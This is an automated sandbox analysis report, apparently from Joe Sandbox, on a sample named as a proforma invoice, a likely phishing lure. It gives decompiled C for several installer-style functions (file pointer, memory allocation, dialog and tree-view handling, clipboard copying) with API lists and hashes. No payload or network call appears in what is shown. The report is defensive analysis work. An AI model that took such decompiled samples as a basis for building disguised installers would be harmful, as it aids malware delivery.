Download Yara Rule

C-Code - Quality: 100%

			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004031ff
0x00403205

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 6F73101B, Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E6F73101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E6F7314BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E6F7314E2();
			}

0x6f73101b
0x6f731022
0x6f73102f
0x6f731035
0x6f731024
0x6f731024
0x6f731024
0x6f73103c

APIs

GlobalAlloc.KERNELBASE(00000040,?,6F731019,00000001), ref: 6F73102F

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: bb7b4a88d4b5e6324b060311a4210171d95a130fc27b61f67172124a4669822b
Instruction ID: b08bd7909c62f264ea21e45771ff7be57387dd25216da703882f3c57c8d73157
Opcode Fuzzy Hash: bb7b4a88d4b5e6324b060311a4210171d95a130fc27b61f67172124a4669822b
Instruction Fuzzy Hash: 1EC08CB3C04321BAD56082F84B0AE1A23AC8B8D356F10C811F642C90C2DBA4C1000230

Uniqueness

Uniqueness Score: -1.00%

Function 6F731215, Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F731215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x6f73405c); // executed
				return _t1;
			}

0x6f73121d
0x6f731223

APIs

GlobalAlloc.KERNELBASE(00000040,6F731233,?,6F7312CF,-6F73404B,6F7311AB,-000000A0), ref: 6F73121D

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: c9ecd1e439df544c64e34d6f3df9aa898753746d0f2614565d891208adcd3b17
Instruction ID: 2ec0e35edc83c12373b8139b490a2c398aa00fed3e4eed3542337e5adc208c93
Opcode Fuzzy Hash: c9ecd1e439df544c64e34d6f3df9aa898753746d0f2614565d891208adcd3b17
Instruction Fuzzy Hash: EFA001B2A48904EADEA59AE0890AE143A22A78A722F0080A2E3159419486664024AB25

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x0040504b
0x00405051
0x0040505a
0x0040505d
0x004051f5
0x00405219
0x00405219
0x0040522c
0x0040524a
0x00405251
0x004052a8
0x004052ac
0x00000000
0x004052b3
0x004052bb
0x004052c3
0x004052c6
0x004053bf
0x00000000
0x004053bf
0x004052d5
0x004052e1
0x004052e7
0x004052ed
0x00405302
0x00405308
0x004052ef
0x004052f4
0x004052fa
0x004052fd
0x004052fd
0x00405318
0x00405320
0x00405323
0x0040532c
0x0040532f
0x00405336
0x0040533d
0x00405345
0x00405345
0x0040535c
0x0040535c
0x00405363
0x00405369
0x00405372
0x00405379
0x00405382
0x00405384
0x00405387
0x00405396
0x00405398
0x0040539e
0x0040539f
0x004053a0
0x004053a8
0x004053b3
0x004053b9
0x004053b9
0x00000000
0x00405323
0x004052ac
0x00405259
0x00405289
0x00405291
0x0040529c
0x0040529c
0x004052a3
0x00000000
0x004052a3
0x0040525d
0x00405267
0x00000000
0x0040522e
0x00405234
0x0040526c
0x00000000
0x00405275
0x0040523d
0x00405242
0x00405245
0x00000000
0x00405245
0x0040522c
0x00405063
0x00405067
0x00405070
0x00405077
0x0040507a
0x0040507d
0x00405080
0x00405081
0x00405082
0x0040509b
0x0040509e
0x004050a8
0x004050b7
0x004050bf
0x004050c7
0x004050cc
0x004050cf
0x004050db
0x004050e4
0x004050ed
0x00405110
0x00405116
0x00405127
0x0040512c
0x0040513a
0x00405148
0x00405148
0x0040514d
0x0040515b
0x0040515b
0x00405160
0x00405163
0x00405168
0x00405174
0x0040517d
0x0040518a
0x00405199
0x0040518c
0x00405191
0x00405191
0x004051a5
0x004051a5
0x004051b9
0x004051c2
0x004051cb
0x004051db
0x004051e7
0x004051e7
0x00000000

APIs

GetDlgItem.USER32 ref: 004050A1
GetDlgItem.USER32 ref: 004050B0
GetClientRect.USER32 ref: 004050ED
GetSystemMetrics.USER32 ref: 004050F5
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
ShowWindow.USER32(?,00000008), ref: 00405191
GetDlgItem.USER32 ref: 004051B2
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
GetDlgItem.USER32 ref: 004050BF

Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B

GetDlgItem.USER32 ref: 00405204
CreateThread.KERNEL32(00000000,00000000,Function_00004FD6,00000000), ref: 00405212
CloseHandle.KERNEL32(00000000), ref: 00405219
ShowWindow.USER32(00000000), ref: 0040523D
ShowWindow.USER32(?,00000008), ref: 00405242
ShowWindow.USER32(00000008), ref: 00405289
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
CreatePopupMenu.USER32 ref: 004052CC
AppendMenuA.USER32 ref: 004052E1
GetWindowRect.USER32 ref: 004052F4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
OpenClipboard.USER32(00000000), ref: 00405363
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
GlobalLock.KERNEL32 ref: 0040537C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
SetClipboardData.USER32(00000001,00000000), ref: 004053B3
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004053B9

Strings

{, xrefs: 004052A8

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404871
0x00404877
0x00404879
0x0040487f
0x00404885
0x00404892
0x0040489b
0x0040489e
0x004048a1
0x00404ac9
0x00404ad0
0x00404ae4
0x00404ad2
0x00404ad4
0x00404ad7
0x00404ad8
0x00404adf
0x00404adf
0x00404af0
0x00404afe
0x00404b01
0x00404b17
0x00404b8f
0x00404b92
0x00404b94
0x00404b9e
0x00404bac
0x00404bac
0x00404bae
0x00404bb8
0x00404bbe
0x00404bdf
0x00404bc0
0x00404bcd
0x00404bcd
0x00404bbe
0x00404bb8
0x00000000
0x00404b92
0x00404b1c
0x00404b27
0x00404b2c
0x00404b33
0x00404b3a
0x00404b44
0x00404b44
0x00404b48
0x00404b4d
0x00404b52
0x00404b68
0x00404b54
0x00404b54
0x00404b5c
0x00404b63
0x00404b5e
0x00404b5e
0x00404b5e
0x00404b5c
0x00404b6c
0x00404b6e
0x00404b7c
0x00404b7d
0x00404b89
0x00404b8c
0x00404b8c
0x00404b4d
0x00000000
0x00404b3a
0x00404b1e
0x00404b25
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404be2
0x00404be2
0x00404be9
0x00404c5d
0x00404c64
0x00404c70
0x00404c70
0x00404c79
0x00404c7b
0x00404c82
0x00404c85
0x00404c85
0x00404c8b
0x00404c92
0x00404c95
0x00404c95
0x00404c9b
0x00404ca1
0x00404ca7
0x00404ca7
0x00404cb4
0x00404e01
0x00404e08
0x00404e25
0x00404e2b
0x00404e3d
0x00404e3d
0x00000000
0x00404cba
0x00404cbc
0x00404cc4
0x00404cc8
0x00404cc8
0x00404cd0
0x00404d11
0x00404d13
0x00404d23
0x00404d26
0x00404d2b
0x00404d32
0x00404d35
0x00404dd7
0x00404ddd
0x00404deb
0x00404dfc
0x00404dfc
0x00000000
0x00404deb
0x00404d3b
0x00404d3e
0x00404d44
0x00404d49
0x00404d4b
0x00404d4d
0x00404d53
0x00404d5a
0x00404d5f
0x00404d66
0x00404d69
0x00404d69
0x00404d70
0x00404d7c
0x00404d80
0x00404d82
0x00404d82
0x00404d72
0x00404d74
0x00404d74
0x00404da2
0x00404dae
0x00404dbd
0x00404dbd
0x00404dbf
0x00404dc2
0x00404dcb
0x00000000
0x00404cd2
0x00404cdd
0x00404ce0
0x00404ce5
0x00404ce7
0x00404ceb
0x00404cfb
0x00404d05
0x00404d07
0x00404d0a
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ced
0x00404ced
0x00404cf3
0x00404cf5
0x00404cf5
0x00404cf6
0x00404cf7
0x00000000
0x00404ced
0x00404cd0
0x00404cb4
0x00404bf1
0x00000000
0x00404c07
0x00404c11
0x00404c16
0x00000000
0x00000000
0x00404c28
0x00404c2d
0x00404c39
0x00404c39
0x00404c3b
0x00404c4a
0x00404c4c
0x00404c53
0x00404c56
0x00000000
0x00404c56
0x00404bf1
0x004048a7
0x004048ac
0x004048b6
0x004048b7
0x004048c0
0x004048cb
0x004048d6
0x004048dc
0x004048ea
0x004048ff
0x00404904
0x0040490f
0x00404918
0x0040492d
0x0040493e
0x0040494b
0x0040494b
0x00404950
0x00404956
0x00404958
0x0040495b
0x00404960
0x00404965
0x00404967
0x00404967
0x00404987
0x00404987
0x00404989
0x0040498a
0x0040498f
0x00404992
0x00404995
0x00404999
0x0040499e
0x004049a3
0x004049a7
0x004049ac
0x004049b1
0x004049b3
0x004049bb
0x00404a85
0x00404a98
0x00000000
0x004049c1
0x004049c4
0x004049c7
0x004049ca
0x004049ca
0x004049d0
0x004049d6
0x004049d9
0x004049df
0x004049e0
0x004049e5
0x004049ee
0x004049f5
0x004049f8
0x004049fb
0x004049fe
0x00404a3a
0x00404a63
0x00404a3c
0x00404a49
0x00404a49
0x00404a00
0x00404a03
0x00404a12
0x00404a1c
0x00404a24
0x00404a2b
0x00404a33
0x00404a33
0x004049fe
0x00404a69
0x00404a6a
0x00404a76
0x00404a76
0x00404a83
0x00404a9e
0x00404aa2
0x00404abf
0x00404ac4
0x00404ac7
0x00000000
0x00404aa4
0x00404aa9
0x00404ab2
0x00404e3f
0x00404e51
0x00404e51
0x00404aa2
0x00000000
0x00404a83
0x004049bb

APIs

GetDlgItem.USER32 ref: 0040486A
GetDlgItem.USER32 ref: 00404877
GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
LoadBitmapA.USER32 ref: 004048D6
SetWindowLongA.USER32 ref: 004048F0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
DeleteObject.GDI32(?), ref: 00404950
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
GetWindowLongA.USER32 ref: 00404A8A
SetWindowLongA.USER32 ref: 00404A98
